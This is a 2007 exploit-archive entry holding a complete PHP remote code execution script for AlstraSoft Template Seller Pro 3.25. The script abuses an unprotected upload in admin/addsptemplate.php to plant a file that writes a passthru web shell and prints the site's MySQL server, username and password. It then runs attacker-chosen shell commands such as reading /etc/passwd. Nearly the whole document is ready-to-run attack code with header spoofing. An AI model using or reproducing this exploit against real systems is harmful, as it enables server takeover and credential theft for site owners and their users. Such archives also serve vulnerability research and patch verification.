Alstrasoft Template Seller Pro 3.25 - Remote Code Execution

EDB-ID:

3959


Platform:

PHP

Published:

2007-05-20

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love

";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Host Path CMD
Host:          target server (ip/hostname)
Path:          path of template
CMD:           A Shell Command

Example:
php ".$argv[0]." localhost /template/ cat /etc/passwd";

die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

/*
 ___________________________________________________________________
/       This script is part of the AlstraSoft Exploit Pack:         \
|                                                                   |
|  http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack;  |
|                                                                   |
|            You can find the patches for this bugs at:             |
|                                                                   |
|   http://itablackhawk.altervista.org/download/alsoft_patch.zip    |
|                                                                   |
\________________________.:BlackHawk 2007:._________________________/

*/

/*
VULN EXPLANATION

Same problem of Vuln N.1 but with this we can upload PHP files..

The Vulnerable script can be found in admin/addsptemplate.php


*/

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];

$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$port=80;
$proxy="";

$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "- Uploading Shell Creator..\r\n";
$italy_rulez=
chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).
chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).
chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).
chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).
chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).
chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).
chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).
chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).
chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).
chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).
chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).
chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).
chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).
chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).
chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).
chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).
chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).
chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).
chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).
chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).
chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).
chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).
chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).
chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).
chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).
chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).
chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).
chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).
chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).
chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).
chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).
chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).
chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).
chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).
chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).
chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).
chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).
chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).
chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).
chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).
chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).
chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).
chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).
chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).
chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).
chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).
chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).
chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).
chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).
chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).
chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).
chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).
chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).
chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).
chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).
chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).
chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).
chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).
chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).
chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).
chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).
chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).
chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).
chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).
chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).
chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).
chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).
chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).
chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).
chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).
chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).
chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).
chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).
chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).
chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).
chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).
chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).
chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).
chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).
chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).
chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).
chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).
chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).
chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).
chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).
chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).
chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).
chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).
chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).
chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).
chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).
chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).
chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).
chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).
chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="<?php
\$fp=fopen('piggy_marty.php','w');
fputs(\$fp,'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
\$_GET[cmd]=stripslashes(\$_GET[cmd]);
}
echo 666999;
passthru(\$_GET[cmd]);
echo 666999;
?>');
fclose(\$fp);
chmod('piggy_marty.php',777);
include '../../include/common.php';
echo 'delimitator'.\$db_server.'|'.\$db_user.'|'.\$db_password.'|'.\$db_database;
?>\r\n";
$data.='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="addsubmit"

1
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="type"

2
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="category"

Exploit And Similar
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="sdes"

4
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="fpi"; filename="daforno_imperat.jpeg";
Content-Type: image/pjpeg

'.$italy_rulez.'
-----------------------------7d529a1d23092a--
';
$packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/example.html\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

echo "- Retrieving correct Path where the shell is located..\r\n";

$packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki))
{
echo "- Creating the Shell & getting server credentials..\r\n";
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

sleep(3);
$temp=explode('delimitator',$html);
list($myserver,$myusername,$mypassword,$mydbname)=explode('|',$temp[1]);
echo "

--- INFO FROM COMMON.PHP ---

MySQL Server: $myserver
MySQL Username: $myusername
MySQL Password: $mypassword
MySQL Database: $mydbname

--- END INFO ---

";
echo "Step 5 - Execute Commands exist..\r\n";
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded...\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");
}

}
else
{
die ('Error: Can\'t retrieve Shell Path');
}

# Coded With BH Fast Generator v0.1
?>

# milw0rm.com [2007-05-20]